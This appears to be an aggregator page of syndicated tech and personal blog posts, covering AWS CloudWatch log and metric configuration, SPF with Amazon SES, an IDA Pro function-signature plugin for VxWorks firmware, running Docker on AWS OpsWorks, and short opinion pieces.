  "FullName": "AWS.EC2.Windows.CloudWatch.CustomLog.CustomLogInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "LogDirectoryPath": "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Log",
    "TimestampFormat": "yyyy-MM-dd HH:mm:ss.ff",
    "Encoding": "UTF-16",
    "Filter": "ERRORLOG*",
    "CultureName": "en-US",
    "TimeZoneKind": "Local"
  }
},

This configuration tells the plug-in to look for log files that start with the file name ERRORLOG (e.g. ERRORLOG, ERRORLOG.1, etc.) in the directory C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Log. Finally, the timestamp format setting has been updated to match the timestamp used by SQL Server and the encoding for the file set to reflect that SQL Server uses UTF-16 encoding for the log file.

Performance Counters

In addition to log data, you can also send Windows Performance Counters to CloudWatch as custom metrics. This makes it possible to monitor specific performance indicators from inside an instance and allows you to create alarms based on this data.

The default configuration file contains a sample performance counter that uploads the available memory performance counter:

{
  "Id": "PerformanceCounter",
  "FullName": "AWS.EC2.Windows.CloudWatch.PerformanceCounterComponent.PerformanceCounterInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "CategoryName": "Memory",
    "CounterName": "Available MBytes",
    "InstanceName": "",
    "MetricName": "Memory",
    "Unit": "Megabytes",
    "DimensionName": "",
    "DimensionValue": ""
  }
},

Add an additional performance counter to this – the amount of free space available on the C drive on the instance. Update the configuration file to also include the Logical Disk | Free Megabytes performance counter:

{
  "Id": "PerformanceCounterDisk",
  "FullName": "AWS.EC2.Windows.CloudWatch.PerformanceCounterComponent.PerformanceCounterInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "CategoryName": "LogicalDisk",
    "CounterName": "Free Megabytes",
    "InstanceName": "C:",
    "MetricName": "FreeDisk",
    "Unit": "Megabytes",
    "DimensionName": "",
    "DimensionValue": ""
  }
},

Putting it All Together

The final step in configuring the plug-in is to define what data should be sent where. Towards the end of the default configuration file you will find a section looking like this:

"Flows": {
  "Flows":
  [
    "(ApplicationEventLog,SystemEventLog),CloudWatchLogs"
  ]
}

Detailed information on how this setting works is available here: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#configure_log_flow. To use the configuration defined above, change this section to this:

"Flows": {
  "Flows":
  [
    "(SystemEventLog,ETW),CloudWatchLogsSystem",
    "CustomLogs,CloudWatchLogsSQL",
    "(PerformanceCounter,PerformanceCounterDisk),CloudWatch"
  ]
}

The flow definition uses the component identifiers to specify how data should flow from the source to the destination. In the example above the flow is defined as:

Send log data from the System event log and the ETW log source to the log group System-Logs

Send SQL Server error log file to the log group SQL-Logs

Send the two performance counters to the Windows/Default metric namespace

Now that the configuration is complete, save the configuration file and use the Service Manager to restart the Ec2Config service, or from the command line run the commands:

C:\> net stop ec2config

C:\> net start ec2config

Once the Ec2Config service has restarted, it will start sending both the configured log data and performance counters to CloudWatch Logs and CloudWatch. Note that it will take a few minutes before the first data appears in the console.

Access Log Data in CloudWatch Logs

Shortly after starting the Ec2Config service, you will be able to see the new log groups created in the console at https://console.aws.amazon.com/cloudwatch/home?region=us-east-1#logs:. In our example, we can see both the System-Logs and SQL-Logs log groups and the log data from our example instance in the instance-specific log stream:

Uploaded SQL Server log data.

With the log data in place, you can now create metric filters to start monitoring the events that are relevant to you. More information on how to configure metric filters can be found here: http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/MonitoringPolicyExamples.html

Access Performance Metrics in CloudWatch

With the configuration defined above, you can access the uploaded performance counters in the console at https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-1#metrics:metricFilter=Pattern%253DWindows%252FDefault:

Performance counter data uploaded to CloudWatch.

At this point you can configure alarms on the metrics (for instance, configure an alarm if the FreeDisk metric goes below 20 GB).
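
For example, here is a sketch of creating such an alarm with boto3 (boto3 postdates this post, the alarm name and the 20,480 MB threshold are illustrative, and the metric is assumed to have no dimensions since the sample counter configuration leaves the dimension fields empty):

import boto3

cloudwatch = boto3.client("cloudwatch", region_name="us-east-1")

# Alarm when the FreeDisk custom metric drops below 20 GB (20,480 MB).
cloudwatch.put_metric_alarm(
    AlarmName="low-free-disk-c-drive",          # illustrative name
    Namespace="Windows/Default",
    MetricName="FreeDisk",
    Statistic="Average",
    Period=300,
    EvaluationPeriods=1,
    Threshold=20480,
    ComparisonOperator="LessThanThreshold",
    Unit="Megabytes",
)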

 

Free Books Initiative

Post Syndicated from Йовко Ламбрев original https://blog.yovko.net/free-books/

It is clear to many of us that our society missed out on living through an important part of the processes that led to the world we live in today. Perhaps that is exactly why so many Bulgarians feel like confused passengers on Europe's motley train, with no clear idea of why they are travelling or where to. And that is understandable: behind the Curtain we missed sharing in people's efforts and aspirations toward a united Europe, we missed making sense of their motives, and it all somehow happened apart from us.

Try Inoreader

Post Syndicated from Йовко Ламбрев original https://blog.yovko.net/opitajte-inoreader/

Do you remember Google Reader? It was not just one of Google's good projects, one that I believe many people still miss. It was a cornerstone of a romantic period in the development of the blogosphere (including the Bulgarian one), one that connected communities of people through what they wrote and what they read, before social networks cheapened all that.
The shutdown of Google Reader led to the appearance of many alternatives, some of them quite successful and innovative.

SPF and Amazon SES

Post Syndicated from Adrian Hamciuc original http://sesblog.amazon.com/post/Tx3IREZBQXXL8O8/SPF-and-Amazon-SES

Update (3/14/16): To increase your SPF authentication options, Amazon SES now enables you to use your own MAIL FROM domain. For more information, see Authenticating Email with SPF in Amazon SES.

One of the most important aspects of email communication today is making sure the right person sent you the right message. There are several standards in place to address various aspects of securing email sending; one of the most commonly known is SPF (the short form of Sender Policy Framework). In this blog post we explain what SPF is, how it works, and how Amazon SES handles it. We also address the most common questions we see from customers with regard to their concerns around email security.

What is SPF?

Described in RFC 7208 (http://tools.ietf.org/html/rfc7208), SPF is an open standard designed to prevent sender address forgery. In particular, it is used to confirm that the IP address from which an email originates is allowed to send emails by the owner of the domain that sent the email. What does that mean and how does it happen?

Before going into how SPF works, we should clarify exactly what it does and does not do. First, let’s separate the actual email message body and its headers from the SMTP protocol used to send it. SPF works by authenticating the IP address that originated the SMTP connection to the domain used in the SMTP MAIL-FROM and/or the HELO/EHLO command. The From header, which is part of the email message itself, is not covered by SPF validation. A separate standard, DomainKeys Identified Mail (DKIM), is used to authenticate the message body and headers against the From header domain (which can be different from the domain used in the SMTP MAIL-FROM command).

Now that we’ve talked about what SPF does, let’s look at how it actually works. SPF involves publishing a DNS record in the domain that wants to allow IP addresses to send from it. This DNS record needs to contain either blocks of IP addresses that are permitted to send from it, or another domain to which authorization is delegated (or both). When an ISP receives an email and wants to validate that the IP address that sent the mail is allowed to send it on behalf of the sending domain, the ISP performs a DNS query against the SPF record. If such a record exists and contains the IP address in question or delegates to a domain that contains it, then we know that the IP address is authorized to send emails from that domain.
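For illustration only (the domain and addresses below are made up), such a policy is published as a TXT record on the sending domain, listing permitted address blocks and/or delegating to another domain with an include mechanism:

example.com.   IN   TXT   "v=spf1 ip4:192.0.2.0/24 include:mail.example.net -all"

Here, mail originating from the 192.0.2.0/24 block, or from any address authorized by mail.example.net, passes the check, and everything else fails because of the -all qualifier.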

SPF and Amazon SES

If you are using Amazon SES to send from your domain, you need to know that the current SES implementation involves sending emails from an SES-owned MAIL-FROM domain. This means that you do not need to make any changes to your DNS records in order for your emails to pass SPF authentication.

Common concerns

There are a couple of questions we frequently hear from customers with regard to SPF authorization and how it relates to Amazon SES usage.

The first concern seems to be how your sending is affected if SPF authentication is performed against Amazon SES and not against your own domain.

If you’re wondering whether any other SES customer can send on your behalf, the answer is no. SES does not allow sending from a specific domain or email address until that domain or email address has been successfully verified with SES, a process that cannot take place without the consent of the domain/address’s owner.

The next question is whether you can still have a mechanism under your control that can authenticate the email-related content that you do control (things such as the message body, or various headers such as the From header, subject, or destinations). The answer is yes — Amazon SES offers DKIM signing capabilities (or the possibility to roll out your own). DKIM is another open standard that can authenticate the integrity of an email message, including its content and headers, and can prove to ISPs that your domain (not Amazon’s or someone else’s) takes responsibility and claims ownership of that specific email.

Another concern you may have is how much flexibility you get in using SPF to elicit a specific ISP response for unauthenticated or unauthorized emails from your domain. In particular, this concern translates into configuring DMARC (short for Domain-based Message Authentication, Reporting & Conformance) to work with SES. DMARC is a standard way of telling ISPs how to handle unauthenticated emails, and it’s based on both a) Successful SPF and/or DKIM authentication and b) Domain alignment (all authenticated domains must match). As explained above, your MAIL-FROM domain is currently an SES domain, which doesn’t match your sending domain (From header). As a result, SPF authentication will be misaligned for DMARC purposes. DKIM, on the other hand, provides the necessary domain alignment and ultimately satisfies DMARC because you are authenticating your From domain.

Simply put, you must enable DKIM signing for your verified domain in order to be able to successfully configure DMARC for your domain.
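For reference, a DMARC policy is itself published as a TXT record under the _dmarc label of the sending domain; the record below is purely illustrative (the domain, policy, and reporting address are made up):

_dmarc.example.com.   IN   TXT   "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"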

 If you have any questions, comments or other concerns related to SPF and your Amazon SES sending, don’t hesitate to jump on the Amazon SES Forum and let us know. Thank you for choosing SES and happy sending!

A Code Signature Plugin for IDA

Post Syndicated from Craig original http://www.devttys0.com/2014/10/a-code-signature-plugin-for-ida/

When reversing embedded code, it is often the case that completely different devices are built around a common code base, either due to code re-use by the vendor, or through the use of third-party software; this is especially true of devices running the same Real Time Operating System.
For example, I have two different routers, manufactured by two different vendors, and released about four years apart. Both devices run VxWorks, but the firmware for the older device included a symbol table, making it trivial to identify most of the original function names:
VxWorks Symbol Table
The older device with the symbol table is running VxWorks 5.5, while the newer device (with no symbol table) runs VxWorks 5.5.1, so they are pretty close in terms of their OS version. However, even simple functions contain a very different sequence of instructions when compared between the two firmwares:
strcpy from the VxWorks 5.5 firmware
strcpy from the VxWorks 5.5.1 firmware
Of course, binary variations can be the result of any number of things, including differences in the compiler version and changes to the build options.
Despite this, it would still be quite useful to take the known symbol names from the older device, particularly those of standard and common subroutines, and apply them to the newer device in order to facilitate the reversing of higher level functionality.

Existing Solutions
The IDB_2_PAT plugin will generate FLIRT signatures from the IDB with a symbol table; IDA’s FLIRT analysis can then be used to identify functions in the newer, symbol-less IDB:
Functions identified by IDA FLIRT analysis
With the FLIRT signatures, IDA was able to identify 164 functions, some of which, like os_memcpy and udp_cksum, are quite useful.
Of course, FLIRT signatures will only identify functions that start with the same sequence of instructions, and many of the standard POSIX functions, such as printf and strcmp, were not found.
Because FLIRT signatures only examine the first 32 bytes of a function, there are also many signature collisions between similar functions, which can be problematic:

;--------- (delete these lines to allow sigmake to read this file)
; add '+' at the start of a line to select a module
; add '-' if you are not sure about the selection
; do nothing if you want to exclude all modules

div_r 54 B8C8 00000000000000000085001A0000081214A00002002010210007000D2401FFFF
ldiv_r 54 B8C8 00000000000000000085001A0000081214A00002002010210007000D2401FFFF

proc_sname 00 0000 0000102127BDFEF803E0000827BD0108…………………………..
proc_file 00 0000 0000102127BDFEF803E0000827BD0108…………………………..

atoi 00 0000 000028250809F52A2406000A………………………………….
atol 00 0000 000028250809F52A2406000A………………………………….

PinChecksum FF 5EB5 00044080010440213C046B5F000840403484CA6B010400193C0ECCCC35CECCCD
wps_checksum1 FF 5EB5 00044080010440213C046B5F000840403484CA6B010400193C0ECCCC35CECCCD
wps_checksum2 FF 5EB5 00044080010440213C046B5F000840403484CA6B010400193C0ECCCC35CECCCD

_d_cmp FC 1FAF 0004CD02333907FF240F07FF172F000A0006CD023C18000F3718FFFF2419FFFF
_d_cmpe FC 1FAF 0004CD02333907FF240F07FF172F000A0006CD023C18000F3718FFFF2419FFFF

_f_cmp A0 C947 0004CDC2333900FF241800FF173800070005CDC23C19007F3739FFFF0099C824
_f_cmpe A0 C947 0004CDC2333900FF241800FF173800070005CDC23C19007F3739FFFF0099C824

m_get 00 0000 00803021000610423C04803D8C8494F0…………………………..
m_gethdr 00 0000 00803021000610423C04803D8C8494F0…………………………..
m_getclr 00 0000 00803021000610423C04803D8C8494F0…………………………..

Alternative Signature Approaches
Examining the functions in the two VxWorks firmwares shows that a small fraction (about 3%) of the unique subroutines are identical between both firmware images:
bcopy from the VxWorks 5.5 firmware
bcopy from the VxWorks 5.5.1 firmware
Signatures can be created over the entirety of these functions in order to generate more accurate fingerprints, without the possibility of collisions due to similar or identical function prologues in unrelated subroutines.
Still other functions are very nearly identical, as exemplified by the following functions which only differ by a couple of instructions:
A function from the VxWorks 5.5 firmware
The same function, from the VxWorks 5.5.1 firmware
A simple way to identify these similar, but not identical, functions in an architecture independent manner is to generate “fuzzy” signatures based only on easily identifiable actions, such as memory accesses, references to constant values, and function calls.
In the above function for example, we can see that there are six code blocks, one which references the immediate value 0xFFFFFFFF, one which has a single function call, and one which contains two function calls. As long as no other functions match this “fuzzy” signature, we can use these unique metrics to identify this same function in other IDBs. Although this type of matching can catch functions that would otherwise go unidentified, it also has a higher propensity for false positives.
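As a rough sketch of the idea (plain Python, independent of the IDA API; the function names come from the firmware discussed above, but the metric values are made up for illustration), matching on such a tuple of coarse metrics could look like this:

from collections import defaultdict

def fuzzy_signature(block_count, immediates, calls_per_block):
    # Sort the metrics so that minor block reordering between builds
    # does not change the resulting signature.
    return (block_count, tuple(sorted(immediates)), tuple(sorted(calls_per_block)))

# Metrics gathered from named functions in the IDB that has a symbol table
# (the numbers here are invented for the sake of the example).
known_functions = {
    "bcopy": (6, [0xFFFFFFFF], [1, 2]),
    "udp_cksum": (9, [0xFFFF], [0, 1, 1]),
}

by_signature = defaultdict(list)
for name, metrics in known_functions.items():
    by_signature[fuzzy_signature(*metrics)].append(name)

# Metrics gathered from an unnamed function in the symbol-less IDB.
candidate = fuzzy_signature(6, [0xFFFFFFFF], [2, 1])

matches = by_signature.get(candidate, [])
if len(matches) == 1:
    print("Unique fuzzy match:", matches[0])  # safe to propagate the name
else:
    print("Ambiguous or no match; skip it to avoid a false positive")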
A somewhat more reliable metric is unique string references, such as this one in gethostbyname:
gethostbyname string xref
Likewise, unique constants can also be used for function identification, particularly for subroutines related to crypto or hashing:
Constant 0x41C64E6D used by rand
Even identifying functions whose names we don’t know can be useful. Consider the following code snippet in sub_801A50E0, from the VxWorks 5.5 firmware:
Function calls from sub_801A50E0
This unidentified function calls memset, strcpy, atoi, and sprintf; hence, if we can find this same function in other VxWorks firmware, we can identify these standard functions by association.
Alternative Signatures in Practice
I wrote an IDA plugin to automate these signature techniques and apply them to the VxWorks 5.5.1 firmware:
Output from the Rizzo plugin
This identified nearly 1,300 functions, and although some of those are probably incorrect, it was quite successful in locating many standard POSIX functions:
Functions identified by Rizzo
Like any such automated process, this is sure to produce some false positives/negatives, but having used it successfully against several RTOS firmwares now, I’m quite happy with it (read: “it works for me”!).

Running Docker on AWS OpsWorks

Post Syndicated from Chris Barclay original http://blogs.aws.amazon.com/application-management/post/Tx2FPK7NJS5AQC5/Running-Docker-on-AWS-OpsWorks

AWS OpsWorks lets you deploy and manage applications of all shapes and sizes. OpsWorks layers let you create blueprints for EC2 instances to install and configure any software that you want. This blog will show you how to create a custom layer for Docker. For an overview of Docker, see https://www.docker.com/tryit. Docker lets you precisely define the runtime environment for your application and deploy your application code and its runtime as a Docker container. You can use Docker containers to support new languages like Go or to incorporate your dev and test workflows seamlessly with AWS OpsWorks.

 

The Docker layer uses Chef recipes to install Docker and deploy containers to the EC2 instances running in that layer. Simply provide a Dockerfile and OpsWorks will automatically run the recipes to build and run the container. A stack can have multiple Docker layers and you can deploy multiple Docker containers to each layer. You can extend or change the Chef example recipes to use Docker in the way that works best for you. If you aren’t familiar with Chef recipes, see Cookbooks 101 for an introduction.

 

Step 1: Create Recipes

First, create a repository to store your Chef recipes. OpsWorks supports Git and Subversion, or you can store an archive bundle on Amazon S3. The structure of a cookbook repository is described in the OpsWorks documentation.

 

The docker::install recipe installs the necessary Docker software on your instances:

 

case node[:platform]
when "ubuntu","debian"
package "docker.io" do
action :install
end
when 'centos','redhat','fedora','amazon'
package "docker" do
action :install
end
end

service "docker" do
action :start
end

The docker::docker-deploy recipe deploys your docker containers (specified by a Dockerfile):

include_recipe 'deploy'

node[:deploy].each do |application, deploy|

if node[:opsworks][:instance][:layers].first != deploy[:environment_variables][:layer]
Chef::Log.debug("Skipping deploy::docker application #{application} as it is not deployed to this layer")
next
end

opsworks_deploy_dir do
user deploy[:user]
group deploy[:group]
path deploy[:deploy_to]
end

opsworks_deploy do
deploy_data deploy
app application
end

bash "docker-cleanup" do
user "root"
code <<-EOH
if docker ps | grep #{deploy[:application]};
then
docker stop #{deploy[:application]}
sleep 3
docker rm #{deploy[:application]}
sleep 3
fi
if docker images | grep #{deploy[:application]};
then
docker rmi #{deploy[:application]}
fi
EOH
end

bash "docker-build" do
user "root"
cwd "#{deploy[:deploy_to]}/current"
code <<-EOH
docker build -t=#{deploy[:application]} . > #{deploy[:application]}-docker.out
EOH
end

dockerenvs = " "
deploy[:environment_variables].each do |key, value|
dockerenvs=dockerenvs+" -e "+key+"="+value
end

bash "docker-run" do
user "root"
cwd "#{deploy[:deploy_to]}/current"
code <<-EOH
docker run #{dockerenvs} -p #{node[:opsworks][:instance][:private_ip]}:#{deploy[:environment_variables][:service_port]}:#{deploy[:environment_variables][:container_port]} --name #{deploy[:application]} -d #{deploy[:application]}
EOH
end

end

Then create a repository to store your Dockerfile. Here’s a sample Dockerfile to get you going:

FROM ubuntu:12.04

RUN apt-get update
RUN apt-get install -y nginx zip curl

RUN echo "daemon off;" >> /etc/nginx/nginx.conf
RUN curl -o /usr/share/nginx/www/master.zip -L https://codeload.github.com/gabrielecirulli/2048/zip/master
RUN cd /usr/share/nginx/www/ && unzip master.zip && mv 2048-master/* . && rm -rf 2048-master master.zip

EXPOSE 80

CMD ["/usr/sbin/nginx", "-c", "/etc/nginx/nginx.conf"]

Step 2: Create an OpsWorks Stack

Now you’re ready to use these recipes with OpsWorks. Open the OpsWorks console.

Select Add a Stack to create an OpsWorks stack.

Give it a name and select Advanced.

Set Use custom Chef Cookbooks to Yes.

Set Repository type to Git.

Set the Repository URL to the repository where you stored the recipes created in the previous step.

Click the Add Stack button at the bottom of the page to create the stack.

Step 3: Add a Layer

Select Add Layer. 

Choose Custom Layer, set the name to “Docker”, shortname to “docker”, and click Add Layer. 

Click the layer’s edit Recipes action and scroll to the Custom Chef recipes section. You will notice there are several headings—Setup, Configure, Deploy, Undeploy, and Shutdown—which correspond to OpsWorks lifecycle events. OpsWorks triggers these events at key points in the instance’s lifecycle and runs the associated recipes. 

Enter docker::install in the Setup box and click + to add it to the list

Enter docker::docker-deploy in the Deploy box and click + to add it to the list

Click the Save button at the bottom to save the updated configuration. 

Step 4: Add an Instance

The Layer page should now show the Docker layer. However, the layer just controls how to configure instances. You now need to add some instances to the layer. Click Instances in the navigation pane and under the Docker layer, click + Instance. For this walkthrough, just accept the default settings and click Add Instance to add the instance to the layer. Click start in the row’s Actions column to start the instance. OpsWorks will then launch a new EC2 instance and run the Setup recipes to configure Docker. The instance’s status will change to online when it’s ready.

 

Step 5: Add an App & Deploy

Once you’ve started your instances:

In the navigation pane, click Apps and on the Apps page, click Add an app.

On the App page, give it a Name.

Set the app’s type to other.

Specify the app’s repository type. 

Specify the app’s repository URL. This is where your Dockerfile lives and is usually a separate repository from the cookbook repository specified in step 2.

Set the following environment variables:

container_port – Set this variable to the port specified by the EXPOSE parameter in your Dockerfile.

service_port – Set this variable to the port your container will expose on the instance to the outside world. Note: Be sure that your security groups allow inbound traffic for the port specified in service_port.

layer – Set this variable to the shortname of the layer that you want this container deployed to (from Step 3). This lets you have multiple docker layers with different apps deployed on each, such as a front-end web app and a back-end worker. 

For our example, set container_port=80, service_port=80, and layer=docker. You can also define additional environment variables that are automatically passed onto your Docker container, for example a database endpoint that your app connects with. 
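With those values, the docker-run resource in the recipe above ends up executing a command roughly like the following on the instance (the private IP address and the app name myapp are hypothetical placeholders):

docker run -e container_port=80 -e service_port=80 -e layer=docker -p 10.0.0.12:80:80 --name myapp -d myapp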

Keep the default values for the remaining settings and click Add App. 

To install the code on the server, you must deploy the app. It will take some time for your instances to boot up completely. Once they show up as “online” in the Instances view, navigate to Apps and click deploy in the Actions column. If you create multiple docker layers, note that although the deployment defaults to all instances in the stack, the containers will only be deployed to the layer specified in the layer environment variable.

Once the deployment is complete, you can see your app by clicking the public IP address of the server. You can update your Dockerfile and redeploy at any time.

Step 6: Making attributes dynamic

The recipes written for this blog pass environment variables into the Docker container when it is started. If you need to update the configuration while the app is running, such as a database password, solutions like etcd can make attributes dynamic. An etcd server can run on each instance and be populated by the instance’s OpsWorks attributes. You can update OpsWorks attributes, and thereby the values stored in etcd, at any time, and those values are immediately available to apps running in Docker containers. A future blog post will cover how to create recipes to install etcd and pass OpsWorks attributes, including app environment variables, to the Docker containers.

 

Summary

These instructions have demonstrated how to use AWS OpsWorks and Docker to deploy applications, represented by Dockerfiles. You can also use Docker layers with other AWS OpsWorks features, including automatic instance scaling and integration with Elastic Load Balancing and Amazon RDS. 

 

Always Follow the Money

Post Syndicated from Bradley M. Kuhn original http://ebb.org/bkuhn/blog/2014/10/10/anita-borg.html

Selena Larson wrote an article
describing the Male Allies Plenary Panel at the Anita Borg
Institute’s Grace Hopper Celebration on Wednesday night
. There is a
video available of the
panel
(that’s the youtube link, the links on Anita Borg Institute’s
website don’t work with Free Software).

Selena’s article pretty much covers it. The only point that I thought
useful to add was that one can “follow the money” here.
Interestingly
enough, Facebook,
Google, GoDaddy, and Intuit were all listed as top-tier sponsors of the event
.
I find it a strange correlation that not one man on this panel is from a
company that didn’t sponsor the event. Are there no male allies
to the cause of women in tech worth hearing from who work for companies that, say,
don’t have enough money to sponsor the event? Perhaps that’s true, but
it’s somewhat surprising.

Honest US Congresspeople often say that the main problem with corruption
of campaign funds is that those who donate simply have more access and time
to make their case to the congressional representatives. They aren’t
buying votes; they’re buying access for conversations. (This was covered
well
in This
American Life, Episode 461
).

I often see a similar problem in the “Open Source” world. The
loudest microphones can be bought by the highest bidder (in various ways),
so we hear more from the wealthiest companies. The amazing thing about
this story, frankly, is that buying the microphone didn’t work
this time. I’m very glad the audience refused to let it happen! I’d love
to see a similar reaction at the corporate-controlled “Open Source and
Linux” conferences!

Update later in the day: The conference I’m commenting on
above is the same conference where Satya Nadella, CEO of Microsoft, said
that women shouldn’t ask for raises, and Microsoft is also a
top-tier sponsor of the conference. I’m left wondering if anyone who spoke
at this conference didn’t pay for the privilege of making these gaffes.

Getting Started with CloudWatch Logs

Post Syndicated from Henry Hahn original http://blogs.aws.amazon.com/application-management/post/Tx214L3IEKAQAJA/Getting-Started-with-CloudWatch-Logs

Amazon CloudWatch Logs lets you monitor your applications and systems for operational issues in near real-time using your existing log files.  You can get started in just minutes using the Amazon CloudWatch Logs agent for Amazon Linux, CentOS, Red Hat Linux, and Ubuntu.

In this blog post, we’ll show you how easy it is to get started by walking through the installation process on Linux-based systems.  CloudWatch Logs is also supported on Windows Server, which we’ll cover in another post (for more information, see Configuring a Windows Instance Using the EC2Config Service).

Step 1: Permissions

CloudWatch uses the Identity and Access Management (IAM) service for authentication and authorization. In this blog post, we’re using a feature of IAM called IAM Roles for EC2, which lets us associate specific permissions with an Amazon EC2 instance when you launch it.

In this case, we launched an instance with an IAM role whose policy allows all CloudWatch Logs actions (to learn more about adding a policy to an existing IAM role, see IAM Users and Groups and Managing IAM Policies in Using IAM):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "logs:*"
      ],
      "Resource": [
        "arn:aws:logs:*:*:*"
      ]
    }
  ]
}

Step 2: Agent Installation & Configuration

With the right permissions set, we can connect to our EC2 instance with an SSH client and run the CloudWatch Logs Agent interactive setup. For more information about how to connect to your EC2 instance, see Connect to Your Instance in the Amazon Elastic Compute Cloud User Guide.

First, we’ll retrieve the agent with a simple wget command and then run the installer.  Note that CloudWatch Logs is currently available in three regions: us-east-1, us-west-2, and eu-west-1.  In this example, we used the us-east-1 region (this is where the logs are processed and stored).

wget https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py
sudo python ./awslogs-agent-setup.py --region us-east-1

The installer will walk you through a set of questions to get you up and running:

Credentials

The CloudWatch Logs agent first asks for credential information. Since we’re using the IAM role associated with our running instance, we can just press “Enter” when prompted for the AWS Access Key ID and Secret Access Key (otherwise, we would have provided the keys).

Default Region Name & Output Format

The default region name will show as the region you pass as the region argument to the setup (us-east-1, in our case); we just press “ENTER” to accept.  The default output format determines output of the related CLI commands.  You can also press “ENTER”.

Log File to Send

The installer now asks what log file you would like for the agent to send to CloudWatch for monitoring. By default, the installer suggests /var/log/messages but you can choose any file you like. In this example, we’ll use the default value of /var/log/messages and just press “ENTER”.

Log Group

We’re asked what log group we want the log data to be in. By default, the setup process suggests a log group with the same name as path and file being sent to CloudWatch. Again, we’ll press “ENTER” to accept the default.

Log Stream Name

Next, we need to give this source, or log stream, a name. The installer makes it easy to choose the host name, the instance ID (if running on EC2) or a name of your choosing (custom.) Again, we’ll use the default name derived from the instance ID.

Timestamp

Most log data includes a timestamp. CloudWatch Logs will use the timestamp embedded in each event if you provide the format.  In our case, we chose the default by pressing “ENTER” but you can always provide a custom time stamp (for more info see the CloudWatch Logs Agent reference.)
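For a typical /var/log/messages entry such as "Oct 14 08:23:17 myhost sshd[1234]: message text", a strftime-style format along the lines of %b %d %H:%M:%S would match the leading timestamp; treat this as an illustration, since the exact format string depends on how your log file writes its timestamps.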

Initial Upload Position

CloudWatch Logs can begin uploading data from the beginning of a log file or start “tailing” it from the end as new events are added.  If you have existing log data that you want to have sent to CloudWatch, you can choose the first option which will send log data starting at the beginning of the file.  In both options, the agent will continue to monitor the file for any new log events.

After you have completed the CloudWatch Logs agent installation steps, the installer asks if you want to configure another log file. For the sake of this example, we’re just going to monitor /var/log/messages, but you can run the process as many times as you like for each log file. For more information about the settings in the agent configuration file, see CloudWatch Logs Agent Reference. Once the installer is complete, it will start the agent with the new configuration.  You can see what this entire process will look like, below.

Step 3: Access Log Data in CloudWatch Logs

Once the agent is started, it will begin sending log data to CloudWatch. We can now visit the console at https://console.aws.amazon.com/cloudwatch/home?region=us-east-1#logs to see the new data showing up. In our case, the newly created log group and log stream appear in the CloudWatch console after the agent has been running for a few moments.
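If you would rather check from the API than the console, a small boto3 script along these lines can confirm that events are arriving (this is just a sketch; it assumes the default log group name /var/log/messages chosen above and the us-east-1 region):

import boto3

logs = boto3.client("logs", region_name="us-east-1")

# Find the most recently active stream in the /var/log/messages group.
streams = logs.describe_log_streams(
    logGroupName="/var/log/messages",
    orderBy="LastEventTime",
    descending=True,
    limit=1,
)["logStreams"]

if streams:
    # Fetch a handful of the latest events from that stream.
    events = logs.get_log_events(
        logGroupName="/var/log/messages",
        logStreamName=streams[0]["logStreamName"],
        limit=10,
    )["events"]
    for event in events:
        print(event["timestamp"], event["message"])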

From here, you can set up metric filters to start monitoring for the events you’re interested in.  For more information on setting up metric filters, see the Creating Metric Filters documentation.

Related Resources

Of course, the CloudWatch Logs Agent can also be deployed with other technologies such as CloudFormation, Elastic Beanstalk and AWS OpsWorks.  You can find related blog posts on these topics, below.

Using Amazon CloudWatch Logs with AWS Elastic Beanstalk

View CloudFormation Logs in the Console

Using Amazon CloudWatch Logs with AWS OpsWorks

 
